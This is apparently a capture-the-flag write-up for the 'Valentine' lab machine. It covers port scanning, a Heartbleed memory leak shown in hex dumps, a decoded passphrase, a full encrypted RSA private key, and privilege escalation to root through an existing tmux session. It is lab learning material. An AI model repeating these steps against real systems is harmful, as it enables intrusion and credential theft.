Enum

NMAP

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
|_ssl-date: 2021-03-28T22:12:11+00:00; -1s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: -1s

Gobuster reveals:

http://10.10.10.79/dev/

http://10.10.10.79/encode/

http://10.10.10.79/encode/decode.php

Box is vulnerable to heardbleed. Copy over script from Searchsploit.

Start leaking stuff from memory

 0200: 42 43 33 38 38 31 33 38 36 36 42 44 31 42 35 33  BC38813866BD1B53
  0210: 44 43 37 36 32 30 37 45 30 38 43 41 35 44 32 31  DC76207E08CA5D21
  0220: 39 35 39 32 37 44 42 44 34 37 42 35 32 30 38 30  95927DBD47B52080
  0230: 44 30 37 30 31 45 46 31 37 42 43 43 39 45 44 33  D0701EF17BCC9ED3
  0240: 34 37 36 42 35 32 39 39 39 35 46 43 35 38 43 33  476B529995FC58C3
  0250: 38 34 33 41 32 33 42 41 46 38 37 38 36 35 43 22  843A23BAF87865C" 
  0260: 3E 6D 61 63 2D 69 6E 74 65 6C 3C 2F 64 65 76 69  >mac-intel</devi
  0270: 63 65 2D 69 64 3E 0A 3C 6D 61 63 2D 61 64 64 72  ce-id>.<mac-addr
  0280: 65 73 73 2D 6C 69 73 74 3E 0A 3C 6D 61 63 2D 61  ess-list>.<mac-a
  0290: 64 64 72 65 73 73 3E 64 31 3A 32 34 3A 64 63 3A  ddress>d1:24:dc:
  02a0: 35 30 3A 30 36 3A 66 30 3C 2F 6D 61 63 2D 61 64  50:06:f0</mac-ad
  02b0: 64 72 65 73 73 3E 3C 2F 6D 61 63 2D 61 64 64 72  dress></mac-addr
  02c0: 65 73 73 2D 6C 69 73 74 3E 0A 3C 67 72 6F 75 70  ess-list>.<group
  02d0: 2D 73 65 6C 65 63 74 3E 56 50 4E 3C 2F 67 72 6F  -select>VPN</gro
  02e0: 75 70 2D 73 65 6C 65 63 74 3E 0A 3C 67 72 6F 75  up-select>.<grou
  02f0: 70 2D 61 63 63 65 73 73 3E 68 74 74 70 73 3A 2F  p-access>https:/
  0300: 2F 31 30 2E 31 30 2E 31 30 2E 37 39 3A 34 34 33  /10.10.10.79:443
  0310: 3C 2F 67 72 6F 75 70 2D 61 63 63 65 73 73 3E 0A  </group-access>.
  0320: 3C 2F 63 6F 6E 66 69 67 2D 61 75 74 68 3E 74 82  </config-auth>t.
  0330: B5 3A 7A A9 5F D5 2F 0C ED 70 6C 10 6F B5 83 74  .:z._./..pl.o..t
  0340: 69 97 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D  i..
00e0: 31 2F 64 65 63 6F 64 65 2E 70 68 70 0D 0A 43 6F  1/decode.php..Co
  00f0: 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C  ntent-Type: appl
  0100: 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66 6F  ication/x-www-fo
  0110: 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D 0A 43  rm-urlencoded..C
  0120: 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34  ontent-Length: 4
  0130: 32 0D 0A 0D 0A 24 74 65 78 74 3D 61 47 56 68 63  2....$text=aGVhc
  0140: 6E 52 69 62 47 56 6C 5A 47 4A 6C 62 47 6C 6C 64  nRibGVlZGJlbGlld
  0150: 6D 56 30 61 47 56 6F 65 58 42 6C 43 67 3D 3D AC  mV0aGVoeXBlCg==.
  0160: 8C 42 8C D2 C2 50 37 0D 21 54 F1 52 68 F5 7C A5  .B...P7.!T.Rh.|.
  0170: 6C 69 CB 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  li..............

Decode the $text => heartbleedbelievethehype.

Remove the spaces from the hype_key and convert hex to ascii. Reveals private key.

-----BEGIN RSA PRIVATE KEY-----                                                                                                                                                               
Proc-Type: 4,ENCRYPTED                                                                                                                                                                        
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46

DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi
Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P
OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd
pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH
QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E
p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC
Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO
t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5
XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK
aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ
+wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E
AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q
r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe
2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky
e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP
09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC
dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX
cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY
pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj
Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL
suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW
l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT
RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
-----END RSA PRIVATE KEY-----

Since the name of the original file was hype_key I suppose that hype is the user and that heartbleedbelievethehype is the password for the rsa key.

Linpeas reveals there is a tmux session running as root

Running the observed command gives us root shell.